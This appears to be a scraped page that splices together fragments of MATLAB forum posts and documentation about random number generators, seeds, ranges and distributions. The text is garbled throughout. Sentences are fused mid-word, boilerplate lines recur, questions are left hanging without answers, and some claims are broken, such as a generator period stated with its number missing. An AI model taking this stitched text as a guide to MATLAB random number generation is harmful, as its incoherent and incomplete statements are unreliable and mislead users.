2-to-1 MUX you will build is shown in Figure 5. The\n\ncontrol/select input, ‘A/~B’, indicates that the output is identical to the A input when the select signal is high (1) and identical to the B input when the select\n\nsignal is low (0).\nFigure 5. Subcircuit symbol and truth table for a 1-bit 2-to-1 MUX\nUsing the Karnaugh Map methods you learned in lecture, design, build and test a NOR/NOR implementation of the 1-bit 2-to-1 MUX. You will want to base your design on\n\nthe minimal SOP form of the equation that defines the MUX output. (When you need the complement of a variable or a function, you may use inverters, i.e., NOT gates,\n\nrather than using NOR gates connected as inverters.) Test the circuit and record the results as a truth table in your lab template. 
Once you are convinced that the\n\ncircuit is working correctly, imbed it in a subcircuit, label it “MUX_1” as shown in Figure 5.\nTask 2-5: Build a 2-Input 4-Bit Multiplexer\nBecause our microprocessor operates on 4-bit numbers, it will be necessary to construct a 4-bit, 2-to-1 MUX. The 4-bit MUX should use a single control/select line to\n\nselect one of two 4-bit numbers and the selected 4-bit number should appear on the output of the MUX. A 2-bit 2-to-1 MUX is shown in Figure 6. Expand on this figure to\n\ndesign\n\nyour 4-bit MUX. Build and test the 4-bit MUX. Once you are satisfied that it is working correctly, imbed it in a subcircuit, and label the subcircuit “MUX_4” (Figure\n\n7).\nFigure 6. 2-bit 2-to-1 MUX\nFigure 7. Subcircuit symbol for a 4-bit 2-to-1 MUX\nTask 2-6: Build and Test a 1-to-2 Decoder Using NOR/NOR Logic\nThe other piece of hardware our microprocessor will need is a decoder, and it will be used to control access to memory. The truth table and subcircuit symbol for the\n\n1-bit 1-to-2 decoder you will build is shown in Figure 8. When the EN input is low, the decoder is disabled, so both Y0 and Y1 output zeroes; when the EN input is\n\nhigh, the decoder decodes the binary number A0 to a decimal number, and the Y output with subscript corresponding to that decimal number will output a one, with the\n\nrest of Y’s outputting zeroes.\nFigure 8. Subcircuit symbol and truth table for a 1-bit 1-to-2 decoder\nBuild, and test the 1-bit, 1-to-2 decoder using only NOR/NOR logic. You will want to base your design on the minimal POS form of the equations that define the decoder\n\noutputs Y0 and Y1. (When you need the complement\n\nof a variable or a function, you may use inverters, i.e., NOT gates, rather than using NOR gates connected as inverters.) Test the circuit and record the results as a\n\ntruth table in your lab template. Once you are convinced that the circuit is working correctly, imbed it in a subcircuit, label it “DECODER_1” as shown in Figure 8.\nTask 2-7: Build and Test a 2-to-4 Decoder Using NOR/NOR Logic\nThe microprocessor you will build will need a larger decoder than that constructed above. Let’s start by building a 2-to-4 decoder. A 2-to-4 decoder has the function\n\ndefinition table shown in Figure 9. Just like a 1-to-2 decoder, when the EN input is low, the decoder is disabled, so all Y’s output zeroes; when the EN input is high,\n\nthe decoder decodes the binary number (A1A0) to a decimal number, and the Y output with subscript corresponding to that decimal number will output a one, with the rest\n\nof Y’s outputting zeroes.\nFigure 9. Subcircuit symbol and function definition table for a 1-bit 2-to-4 decoder\nBuild, and test the 1-bit, 2-to-4 decoder using only NOR/NOR logic. (When you need the complement of a variable or a function, you may use inverters, i.e., NOT gates,\n\nrather than using NOR gates connected as inverters.) Imbed your circuit in a subcircuit labeled “DECODER_2” as shown in Figure 9.\nTask 2-8: Design, Build & Test a 4-to-16 Decoder Using 2-to-4 Decoders\nAn alternate scheme for building the 1-bit 2-to-4 decoder using primitive logic gates as in Task 2-7 is to build the decoder using the 1-bit 1-to-2 decoders built in\n\nTask 2-6. Justify to yourself that the circuit of Figure 10 will function as a 1-bit 2-to-4 decoder. Also prove to yourself that when the EN input line is inactive\n\n(i.e., 0), all output lines will be inactive.\nFigure 10. 
Schematic for a 2-to-4 decoder constructed from 1-to-2 decoders\nUsing the technique illustrated in Figure 10, design, build, and test a 1-bit 4-to-16 decoder using only the 1-bit 2-to-\n4 decoder subcircuits you constructed in Task 2-7. Imbed your circuit in a subcircuit labeled “DECODER_4” (see Figure 11 for the subcircuit symbol to use).\n\nFigure 11. Subcircuit symbol for a 1-bit 4-to-16 decoder\nTask 2-9: Build a 4-Bit Buffer\nA buffer is a circuit with a data and a control input. The control input controls whether the data input signal is allowed to propagate to buffer’s output. The buffer\n\ncircuit uses the three-state device described in lecture.\nA 1-bit three-state buffer in Logisim (under Gates-> Controlled Buffer) has a single active high enable as shown in Figure 12. When EN = 0, the output Y is in high\n\nimpedance state; when EN = 1, the output Y is the same as input A.\nFigure 12. 1-bit tri-state buffer in Logisim\nIn our microprocessor, we will need to have more than two sources share a common communication bus. If the outputs of many three-state buffers are wired together and\n\nall but one are in the high-impedance state, then the active buffer will control the value measured at the output; however, if the outputs do not ‘take turns’\n\nproperly, (i.e., if more than one of the three-state buffers is active) the potential exists for a data conflict. Therefore, it is necessary when using three-state\n\ndevices to be sure that all outputs but one are in the high-impedance state.\nIn our microprocessor, we will use buffer circuits to allow eight 4-bit memory locations to share a common communication bus. To allow these memory circuits to share a\n\ncommon 4-bit communication bus, we will need to use a 4-bit buffer circuit made of four three-state devices that share a common enable signal.\nFor our microprocessor, we will need a 4-bit buffer. In Logisim, you can insert a 4-bit buffer by clicking Gates->Controlled Buffer. Set Data Bits to 4.\n8\nFigure 13. 4-bit tri-state buffer in Logisim\nBuild and test the circuit in Figure 13. Mention briefly in your lab template how you tested your circuit and comment on why you believe that your tests are a reliable\n\nindicator that your circuit is operating correctly." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8640848,"math_prob":0.8443822,"size":12883,"snap":"2022-05-2022-21","text_gpt3_token_len":3250,"char_repetition_ratio":0.14302352,"word_repetition_ratio":0.14285715,"special_character_ratio":0.2345727,"punctuation_ratio":0.100187615,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.98265797,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T18:03:34Z\",\"WARC-Record-ID\":\"<urn:uuid:f1f96ab9-054d-44a7-8df7-268d32bea88b>\",\"Content-Length\":\"49833\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:744faee0-e556-4f7c-bfd0-6966fcd3eb2e>\",\"WARC-Concurrent-To\":\"<urn:uuid:0365e018-276c-4572-9fea-9c6769a3e4cd>\",\"WARC-IP-Address\":\"198.46.81.194\",\"WARC-Target-URI\":\"https://www.aplusanswers.com/4-bit-full-adder-multiplexer-decoder-buffer/\",\"WARC-Payload-Digest\":\"sha1:2SZMG2SYLIZ5RRVILYIRL7GKU4TJZXXW\",\"WARC-Block-Digest\":\"sha1:NLZEBL2QTXZFX5IQSPGYU2XJQJ2DLISR\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303868.98_warc_CC-MAIN-20220122164421-20220122194421-00693.warc.gz\"}"}
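The lab text above specifies the 1-bit full adder by its truth table (SUM is the 3-input XOR of A, B, Cin; Cout is the majority function) and then chains four of them into a ripple-carry 4-bit adder (Figures 3 and 4). Before wiring gates in Logisim, it can help to check the logic in software. The sketch below is a hypothetical Python model of that structure, with an exhaustive test in the spirit of Task 2-3's question about what makes a sufficient test set; it is not part of the lab handout.

```python
# Bit-level model of the lab's 1-bit full adder and 4-bit ripple-carry adder.
# SUM = A xor B xor Cin; Cout = AB + ACin + BCin (majority), matching Table 1.

def full_adder_1(a, b, cin):
    s = a ^ b ^ cin
    cout = (a & b) | (a & cin) | (b & cin)
    return s, cout

def full_adder_4(a_bits, b_bits, cin=0):
    """a_bits/b_bits are [LSB..MSB] lists of four bits; returns (sum_bits, carry)."""
    carry, out = cin, []
    for a, b in zip(a_bits, b_bits):
        s, carry = full_adder_1(a, b, carry)
        out.append(s)
    return out, carry

def to_bits(n):
    """4-bit little-endian representation of an integer 0..15."""
    return [(n >> i) & 1 for i in range(4)]

def from_bits(bits):
    return sum(b << i for i, b in enumerate(bits))

# Exhaustive check against ordinary integer addition: all 16 x 16 x 2 inputs.
for a in range(16):
    for b in range(16):
        for cin in (0, 1):
            s_bits, cout = full_adder_4(to_bits(a), to_bits(b), cin)
            assert from_bits(s_bits) + (cout << 4) == a + b + cin
print("4-bit adder matches integer addition for all 512 input combinations")
```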
https://herongyang.com/Neural-Network/Python-SciPy-Library-for-Mathematical-Functions.html
[ "SciPy - Python Library for Mathematical Functions\n\nThis section provides a tutorial example on how to install Python 3 SciPy library on macOS computers. SciPy is widely used by Python users for mathematical functions required in neural network models.\n\nWhat Is SciPy? SciPy is an open-source Python library for scientific computing developed initially by Travis Oliphant and now maintained by the SciPy community.\n\nIf you want to build neural network models in Python, you should install SciPy and get familiar with its functionalities by following this tutorial. This is because neural network models require lots of mathematical functions, which are provided in SciPy.\n\n1. Install SciPy library using the \"pip3\" (Package Installer for Python 3) command:\n\n```herong\$ python3 --version\nPython 3.8.0\n\nherong\$ sudo pip3 install scipy\nCollecting scipy\nInstalling collected packages: scipy\nSuccessfully installed scipy-1.5.0\n```\n\n3. Verify SciPy installation by importing \"scipy\" package, retrieving its version string, and calling some statistical functions.\n\n```herong\$ python3\nPython 3.8.0 (v3.8.0:fa919fdf25, Oct 14 2019, 10:23:27)\n\n>>> import scipy as sp\n>>> sp.__version__\n'1.5.0'\n\n>>> import numpy as np\n>>> s = np.random.rand(1000000)\n\n>>> from scipy import stats\n\n>>> stats.tmean(s)\n0.5000266615822236\n\n>>> stats.tvar(s)\n0.08345433925168123\n```\n\nNote that:\n\n• random.rand() function from NumPy library was used to generate a dataset of 1,000,000 random numbers between 0 and 1.\n• stats.tmean() function from SciPy library calculated the mean value of the dataset as 0.5000266615822236, which is very close to the theoretical value of 0.5.\n• stats.tvar() function from SciPy library calculated the variance value of the dataset as 0.08345433925168123, which is very close to the theoretical value of 0.08333... (or 1/12).\n\nCool! You have SciPy library ready on your Python 3 environment for mathematical and statistical functions.\n\nFor more readings on SciPy, visit SciPy documentation Website at https://docs.scipy.org/doc/scipy/reference/." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69642246,"math_prob":0.66193306,"size":2033,"snap":"2021-21-2021-25","text_gpt3_token_len":475,"char_repetition_ratio":0.1424347,"word_repetition_ratio":0.01438849,"special_character_ratio":0.24299066,"punctuation_ratio":0.15320334,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98925716,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-10T22:34:59Z\",\"WARC-Record-ID\":\"<urn:uuid:014b9bd5-8dba-4f3f-923d-a298c2115cdb>\",\"Content-Length\":\"11112\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2d7c4059-5374-4dec-8a77-0627bf668d52>\",\"WARC-Concurrent-To\":\"<urn:uuid:4817ba69-70fc-4dbb-8439-780f05145ead>\",\"WARC-IP-Address\":\"74.208.236.35\",\"WARC-Target-URI\":\"https://herongyang.com/Neural-Network/Python-SciPy-Library-for-Mathematical-Functions.html\",\"WARC-Payload-Digest\":\"sha1:4N5SPI7HL3OISORPGXDK3HYJUAHVCBWH\",\"WARC-Block-Digest\":\"sha1:IHRCYIDE3JYRPJOYY3BLGPGU6LT3CYCR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989749.3_warc_CC-MAIN-20210510204511-20210510234511-00520.warc.gz\"}"}
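The tutorial above notes that the sample mean and variance of one million Uniform(0, 1) draws land near the theoretical values 0.5 and 1/12. A small hypothetical follow-up (not from the original page) makes that comparison explicit using the closed forms mean = (a + b) / 2 and variance = (b - a)^2 / 12:

```python
import numpy as np
from scipy import stats

# Compare sample statistics of Uniform(a, b) draws with the closed-form values.
a, b = 0.0, 1.0
s = np.random.rand(1_000_000)          # draws from Uniform(0, 1)

print("sample mean:    ", stats.tmean(s), " theoretical:", (a + b) / 2)
print("sample variance:", stats.tvar(s), " theoretical:", (b - a) ** 2 / 12)
```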
https://web2.0calc.com/questions/help-plz_74921
[ "+0\n\n# help plz\n\n0\n185\n1\n\nThe sum of the digits of a two-digit positive integer is 15. When the digits are reversed, the new number is 27 more than the original number. What was the original number?\n\nJul 8, 2021\n\n#1\n+1\n\nx + y = 15, so y = 15 - x\n\n10y + x = 27 + 10x + y (substitute y = 15 - x)\n\n10(15-x) + x = 27 + 10x + 15 - x\n\n150 - 10x + x = 27 + 10x + 15 - x\n\n150 - 9x = 42 + 9x\n\n108 = 18x, so x = 6 and then y = 9\n\nThe original number is 10x + y = 69 (check: 6 + 9 = 15 and 96 = 69 + 27).\n\nJul 8, 2021" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82346284,"math_prob":0.9999826,"size":319,"snap":"2022-27-2022-33","text_gpt3_token_len":116,"char_repetition_ratio":0.13650794,"word_repetition_ratio":0.08108108,"special_character_ratio":0.46081504,"punctuation_ratio":0.04054054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99963903,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-17T19:44:05Z\",\"WARC-Record-ID\":\"<urn:uuid:bc3bff84-a25f-4a1c-8c0a-23f19ec1d4f0>\",\"Content-Length\":\"20885\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6ff2a488-efd0-4c24-a0f3-e1f2432cf3e9>\",\"WARC-Concurrent-To\":\"<urn:uuid:221fd8e3-b252-4d65-8439-4f424c258f45>\",\"WARC-IP-Address\":\"49.12.23.161\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/help-plz_74921\",\"WARC-Payload-Digest\":\"sha1:QZVYVNYEUFF75XOEZANGLTMSZ5YLECSF\",\"WARC-Block-Digest\":\"sha1:5V5XGPC67J6RDLMIWLCZVGLO63JEIZZG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573104.24_warc_CC-MAIN-20220817183340-20220817213340-00711.warc.gz\"}"}
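The forum answer above solves the system algebraically and arrives at digits 6 and 9, i.e. the number 69. A hypothetical brute-force check over all two-digit integers (not part of the original thread) confirms it is the only solution:

```python
# Brute-force check of the answer derived above: digits sum to 15 and the
# reversed number exceeds the original by 27.
solutions = [n for n in range(10, 100)
             if (n // 10) + (n % 10) == 15
             and 10 * (n % 10) + n // 10 == n + 27]
print(solutions)   # [69]
```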
https://learnbps.bismarckschools.org/mod/glossary/view.php?id=107232&mode=cat&hook=4206
[ "# MAT-02 \"I can ... statements\"\n\n (G) Geometry Categories All categories Not categorized (G) Geometry (MD) Measurement and Data (NBT) Number and Operations in Base Ten (OA) Operations and Algebraic Thinking Prioritized\n\n# Geometry\n\n## Narrative for the (G) Geometry\n\nGrade 2 students learn to name and describe the defining attributes of categories of two-dimensional shapes, including circles, triangles, squares, rectangles, rhombuses, trapezoids, and the general category of quadrilateral. They describe pentagons, hexagons, octagons, and other polygons by the number of sides. Because they have developed both verbal descriptions of these shapes and their defining attributes and a rich store of associated mental images, they are able to draw shapes with specified attributes, such as a shape with five sides or a shape with six angles.\n\nStudents in Grade 2 also explore decompositions of shapes into regions that are congruent or have equal area. For example, two squares can be partitioned into fourths in different ways. Any of these fourths represents an equal share of the shape (e.g., “the same amount of cake”) even though they have different shapes.\n\n## Calculation Method for Domains\n\nDomains are larger groups of related standards. The Domain Grade is a calculation of all the related standards. Click on the standard name below each Domain to access the learning targets and rubrics/ proficiency scales for individual standards within the domain.\n\n#### MAT-02.G.01\n\nUnder Development\n\n MAT-02 Targeted Standards(G) Domain: GeometryCluster: Reason with shapes and their attributes. MAT-02.G.01 Recognize and draw shapes having specified attributes, such as a given number of angles or a given number of equal faces. Identify triangles, quadrilaterals, pentagons, hexagons, and cubes.\n\n• I can\n\n• I can\n\n• I can\n\n• I can\n\n## Proficiency (Rubric) Scale\n\n Score Description Sample Activity 4.0 Student is able to - 3.5 In addition to Score 3.0 performance, the student demonstrates in-depth inferences and applications regarding the more complex content with partial success. 3.0 “The Standard.” Student is able to - 2.5 No major errors or emissions regarding 2.0 content and partial knowledge of the 3.0 content. 2.0 Student is able to - 1.5 In addition to 1.0 content, student has partial knowledge of the 2.0 and/or 3.0 content. 1.0 Student is able to - 0.5 Limited or no understanding of the skill id demonstrated.\n\n## Resources\n\n### Vocabulary\n\n• List\n\n#### MAT-02.G.02\n\nUnder Development\n\n MAT-02 Targeted Standards(G) Domain: GeometryCluster: Reason with shapes and their attributes. MAT-02.G.02 Partition a rectangle into rows and columns of same-size squares and count to find the total number of them.\n\n• I can\n\n• I can\n\n• I can\n\n• I can\n\n## Proficiency (Rubric) Scale\n\n Score Description Sample Activity 4.0 Student is able to - 3.5 In addition to Score 3.0 performance, the student demonstrates in-depth inferences and applications regarding the more complex content with partial success. 3.0 “The Standard.” Student is able to - 2.5 No major errors or emissions regarding 2.0 content and partial knowledge of the 3.0 content. 2.0 Student is able to - 1.5 In addition to 1.0 content, student has partial knowledge of the 2.0 and/or 3.0 content. 
1.0 Student is able to - 0.5 Limited or no understanding of the skill id demonstrated.\n\n## Resources\n\n### Vocabulary\n\n• List\n\n#### MAT-02.G.03\n\n MAT-02 Targeted Standards(G) Domain: GeometryCluster: Reason with shapes and their attributes. MAT-02.G.03 Partition circles and rectangles into two, three, or four equal shares, describe the shares using the words halves, thirds, half of, a third of, etc., and describe the whole as two halves, three thirds, four fourths. Recognize that equal shares of identical wholes need not have the same shape. Partition: Divide into pieces. (ND)\n\n## Student Learning Targets:\n\n### Knowledge Targets\n\n• I can identify one-half, one-fourth, and one-third shaded parts.\n\n### Reasoning Targets\n\n• I can understand that the same shape can be divided into equal parts in different ways.\n\n### Skills (Performance) Targets\n\n• I can divide circles and rectangles into 2,3,and 4 equal parts in different ways.\n• I can use the words halves, thirds, fourths, and half of to describe the equal parts.\n• I can describe one whole as being 2 halves, 3 thirds, and 4 fourths.\n\n## Rubric / Proficiency Scale\n\n Score Description Sample Activity 4.0 Student is able to partition shapes into parts with equal areas; express the area of each part as a unit fraction of the whole; determine if fractions are equivalent; and use models to prove if fractions are greater than/less than another. I can write a fraction to represent the shaded portion of a shape. I can represent a fraction using models or pictures. I can explain why fractions are equivalent. I can use pictures/models to prove if a fraction is greater than/less than another fraction. - 3.5 In addition to Score 3.0 performance, the student demonstrates in-depth inferences and applications regarding the more complex content with partial success. 3.0 Student is able to partition circles and rectangles into two, three, and four equal parts without error; use the words halves, thirds, fourths; and recognize equal shares of identical wholes can have different shapes. I can divide shapes into 2, 3, and 4 equal parts in more than one way with no mistakes. I can use the words halves, thirds, and fourths to describe the equal parts. - 2.5 No major errors or emissions regarding 2.0 content and partial knowledge of the 3.0 content. 2.0 Student is able to divide shapes/pictures into halves and fourths in more than one way without error. I can divide shapes into 2 and 4 equal parts in different ways with no mistakes. I can use the words halves and fourths to describe the equal parts. - 1.5 In addition to 1.0 content, student has partial knowledge of the 2.0 and/or 3.0 content. 1.0 Student is able to identify shapes that have 1/2 and 1/4 parts shaded without error. I can identify shapes/pictures that show 1/2 and 1/4 with no mistakes. - 0.5 Limited or no understanding of the skill is demonstrated.\n\n## Resources\n\n### Vocabulary\n\n• partition / divide\n• equal shares / parts\n• whole\n• one half\n• one fourth\n• one third\n• half of\n• third of\n• fourth of\n• halves\n• thirds\n• fourths\n• two halves\n• three thirds\n• four fourths" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.56784,"math_prob":0.8327486,"size":839,"snap":"2020-10-2020-16","text_gpt3_token_len":211,"char_repetition_ratio":0.16766468,"word_repetition_ratio":0.4040404,"special_character_ratio":0.20262218,"punctuation_ratio":0.104347825,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9652802,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-02T19:52:52Z\",\"WARC-Record-ID\":\"<urn:uuid:16ce7c0d-9f11-46b6-9501-e838d870f01b>\",\"Content-Length\":\"93757\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4f6697c6-f465-4a18-ac4c-8d7eaaa31e13>\",\"WARC-Concurrent-To\":\"<urn:uuid:540e53ae-33bf-4df4-9513-5a4915f11bb2>\",\"WARC-IP-Address\":\"165.234.103.74\",\"WARC-Target-URI\":\"https://learnbps.bismarckschools.org/mod/glossary/view.php?id=107232&mode=cat&hook=4206\",\"WARC-Payload-Digest\":\"sha1:RTIOCKRFR76UUHBGO2RISVWCORQKCEDI\",\"WARC-Block-Digest\":\"sha1:2KMHA7U2SDV7HXRKRDE2FS7TFAU42WCD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370507738.45_warc_CC-MAIN-20200402173940-20200402203940-00220.warc.gz\"}"}
http://pharmaqforms.co.za/o6rf80n/random-generators-matlab.php
[ "# Random generators matlab\n\nLearn more about random numbers, seed To generate a different sequence of random numbers we use a \"seeding\" function. Ask Question 2. generator is published at among Technical Solutions for Matlab as Solution Number 1- 10HYAS, where the problem is demonstrated using a sequence of 5·10 7 consecutive random numbers obtained using the default setting of rand. This way of invoking the generator is available also in the current releases of Matlab. 8 to 4). MATLAB provides built-in functions to generate random numbers with an uniform or Gaussian (normal) distribution. Generate random coordinates around a circle. However, the random number generator it switches to this time is an even older one that was introduced as far back as MATLAB version 4. However they manage to pass many statistical tests of randomness and independence. I want to generate 50 random numbers (with both x and y coordinates) between 0 and 100, but they shouldn't be in the area of two yellow rectangles displayed in the figure. e. Learn more about random number generator, mean, standard-deviation MATLABUse this block to generate random binary-valued or integer-valued data. generate random numbers in range from (0. Generate a random list of words from 2500+ of the most common English words. Open Script. Re: Need a good random generator for matlab a good method for random number generation would be to pick out the time in microseconds from the system clock with a precision of 6 digits at random intervals. ActionScript . Learn more about random number generatorGenerating a random binary matrix. I've found the RANDSTREAM object that has the seed property, but it's read only. Hi, I am an Mechanical student and i am trying to generate a random rough surface (with specified ACF and Std Deviation) using 2D FIR filter in Matlab. 1) Generate 1000 random numbers. Can anyone help me to generate several strings of random integer ? In each string, there must be 5 integers generated which the number are in between 1 and 484. S. Random Numbers, Mean and Standard Deviation in MATLAB: In probability theory, the normal distribution is a very commonly occurring probability distribution — a function that tells the How can I generate random numbers in MATLAB with a fixed sum? How can I plot the projection and the reflection of 3 points onto a plane in MATLAB? How can I add shadowing factor to number of random points generated in MATLAB that represent BTS so that each point has different path loss? How to make a random number generator with a Learn more about matlab, random number generator, distribution generator MATLAB Useful functions and Pseudo-Random Number Generators Exercise Load the MATLAB le returns. If possible, I would like to remove this source of variability. If they type any other letter, the program is terminated. com/questions/18486241/comparing-matlab-and-numpy-code-that-uses-random-number-generationAug 28, 2013 One way to ensure the same numbers are fed to your process is to generate them in one of the two languges, save them and import into the The rand function generates arrays of random numbers whose elements are Generate a uniform distribution of random numbers on a specified interval [a,b] . I've searched on google for the subroutine in MATLAB for generating Dirichlet random vectors, but it seems to turns out nothing. I need to generate a Random Binary Sequence of 1x10000 size. Random number generators can be used to approximate a random integer from a uniform distribution. 
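The snippets above mention drawing random integers from a uniform distribution without ever showing the call, so here is a minimal sketch using MATLAB's randi; the range [1 6] and the 1-by-10 output size are illustrative values only, not taken from any of the quoted questions.

```matlab
% Ten integers, each drawn uniformly from {1, 2, ..., 6}.
rolls = randi([1 6], 1, 10);
disp(rolls)
```

Every integer in the requested range is equally likely, which is what "approximate a random integer from a uniform distribution" amounts to in practice.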
There are four fundamental random number functions: rand, randi, randn, and randperm. I tried the intrinsic functions, 'randn'. 8 to 4) Thanks. I achieve to do this pulse random generator with these blocks: A uniform random number, a matlab function that convert this pulses in other with amplitude +1/-1. Learn more about random numbers, seed2002/09/08 · Hi! I just need to generate random numbers that follow some distribution like poisson, exponential,normal,etc. rand: Uniformly distributed random numbersrandperm: Random permutationrandn: Normally distributed random numbersRandom Number Generators - MATLAB & Simulinkhttps://www. Open up a fresh copy of a recent version of MATLAB and ask it about the random number generator it’s using This is about exercise #5: a random maze generator. 5678, 7. Generating random numbers using for loop. Is there a way to generate from the normal distribution? Can anyone help me to generate several strings of random integer ? In each string, there must be 5 integers generated which the number are in between 1 and 484. That is why they are referred to as pseudorandom generators. 23, No. However, the statistics of these calculations will remain unaffected. MathWorks Machine Translation. The idea is that: the distance is as close as possible. The automated translation of this page is provided by a general purpose third party translator tool. Every time you start MATLAB, the generator resets itself to the same state. —uniform random number generators —random variate generators •The statistical test: •Components —k is the number of bins in the histogram —oi is the number of observed values in bin i in the histogram —ei is the number of expected values in bin i in the histogram •The test —if the sum is less than , then the hypothesis that the MathWorks Machine Translation. . Could anybody tell me how to generate random symmetric positive definite matrices using MATLAB? Stack Exchange Network Stack Exchange network consists of 174 Q&A communities including Stack Overflow , the largest, most trusted online community for developers to learn, share their knowledge, and build their careers. Learn more about random number generatorgenerate random numbers in range from (0. MathWorks Machine Translation. random. mathworks. MATLAB 5 uses a new multiseed random number generator that can generate all the floating-point numbers in the closed interval Theoretically, it can generate over values before repeating itself. In other words, you can not generate analog signals in matlab. Monte Carlo simulations) are not The following is the Matlab code used to generate the figure, which shows MathWorks Machine Translation. num = ceil(rand*3); but I need different values suppose i wanna generate random data from 0 to 3 (ie, qpsk data) in matlab simulink unsing random integer generator. In the case of Matlab and C, this generator is the \"rand()\" function. Learn more about random numbers, seed$\\begingroup$ First, read about the Box-Muller method of generating a pair of independent Gaussian random variables with mean zero and variance $1$. they are big. You can write your own function to generate a random unitary matrix with an input as its dimension. Learn more about random numbers, seedProblem asked to write a code where the user types a number (the amount of random numbers they want) and asked if they would like to continue generating random numbers (works if they type 'y'). 5 meter. generating random signal. 
For example if I could input some sort of \"bias\" parameter which determines the extent to which the numbers tend to be closer to 0 than to 1, for example. This example shows how to use the rng function, which provides control over random number generation. This page explains why it's hard (and interesting) to get a computer to generate proper random numbers. You can generate noise for communication system modeling using the MATLAB Function block with a random number generator. comhttps://www. The following 2 Matlab Help on random RANDOM Generate random arrays from a specified distribution. Let‟s first look try using the formula for creating random numbers from A to B. 0, where later is exclusive, by multiplying output with and then type casting into int, we can generate random integers in any range. After starting MATLAB, the random number generator resets itself always to the same initial state. 2 Compute the Cholesky decomposition of the covariance matrix. The program quickly outputs n random integers in the range from a to b. Now, calculate the sum of this array. 5 to 2 hours to run the code. I understand the random numbers generated from normal distribution in matlab actually come from standard normal distribution. CombRecursive (also known as MRG32k3a): Matches the MATLAB® generator of the same name and produces identical results given the same initial state. for which i need random 4bit sequeces like 1111 1010 1110 1000 so can any one tell me how to generate such sequences in matlab i mean 4bit typed. Problem asked to write a code where the user types a number (the amount of random numbers they want) and asked if they would like to continue generating random numbers (works if they type 'y'). Just share, comment, and Subscribe :)Author: Ka MirulViews: 3,2KRANDOM. Purely Random 1's and 0's. The seed is a number that controls whether the Random Number Generator produces a new set of random numbers or repeats a particular sequence of random numbers. Hi everyone: I am trying to generate true random number by MATLAB. output should be vector form like [0 1 1 2 0 3 1 generating random signal. The Missing Link. Could anybody tell me that How one can generate a random singular matrices using matlab? I know that using rand(n) we can generate a random matrix of order n. MATLAB uses the Mersenne Twister as its default random number generator. With a different default generator, MATLAB will generate different sequences of random numbers by default in the context of tall arrays. To do this, multiply the output of rand by (b-a) then add a. If the text box labeled \"Seed\" is blank, the Random Number Generator will produce a different set of random numbers each time a random number table is created. But I found that these random matrices are non singular while I am interested in generating random singular matrices of higher order. Use rand , randi , randn , and randperm to create arrays of random numbers. I guess the function is rand(). {-1,1}) randomly. However, Matlab environment has already predefined functions to generate random numbers: RAND Uniformly distributed random numbers. random(). more generally, to generate random value between [a b] you can use a generator like this. For these distributions there are functions available directly like poissrnd for Random Noise Generators. . Random Word Generator » A word randomizer for finding quick inspiration. 
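The sentence above stops right before the expression it promises; a common way to write it (with assumed example endpoints, since the thread does not fix a and b) is:

```matlab
a = -1;  b = 1;                  % example interval endpoints (assumed values)
n = 20;                          % number of samples to draw
x = a + (b - a) * rand(1, n);    % uniformly distributed on [a, b]
```

This is the same scaling that appears later in the page as randomArray = A + (B-A)*rand(1,5).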
Save the current state of the random number generator and create a 1-by-5 vector of random 5 Jan 2012I have to agree with the other answers, stating that these generators are not \"absolute\". @Arnab: See Azzi's and Image Analyst's answers, which contains exactly the same. Open the model doc_noise_generators. Ask Question 23. Maybe the function needed to have input and output arguments and you didn't give them. Open Live Script C/C++ Code Generation Generate C and C++ code using MATLAB® Coder™. Look at the site:Hi everyone: I am trying to generate true random number by MATLAB. Hi all please i need to know how to generate a Poisson distributed random variable without using the built-in function (poissrnd). Pseudo-Random Number Generators Part of the postgraduate journal club series, Mathematics, UQ ALWAYS run your simluation with more than one pseudo-random number generator. how i get random number between two numbers , like i want random number between 20-150 like this , random, i know the max number and the minimum number and i want to matlab gave me a random number between the max and the minimum In MATLAB you have a function that generates a random matrix. This way, the same random numbers are produced as if you restarted MATLAB. Generate a random number in a certain range in MATLAB. Hi! I just need to generate random numbers that follow some distribution like poisson, exponential,normal,etc. 255-265. 25, >=-0. To be specific I need a 60x6 matrix that has columns for; force, pressure, torque, thickness and radius with the last column being the cost function for the genetic algorithm. svnit@gmail. 15. For example, to generate a 5-by-5 array of uniformly distributed random numbers on the interval [10,50] Generating a Pseudo-random sequence of plus/minus 1 integers 5 answers In Matlab, I need to generate signs (i. 116k 19 209 389. Sequences of statistically random numbers are used to simulate complex mathematical and physical systems. How to check randomness of random number generators? Ask Question 10. Each of these maintains its own state). In releases up to R2018b, the default random number generator for tallrng is combRecursive. The results also pass various statistical tests of 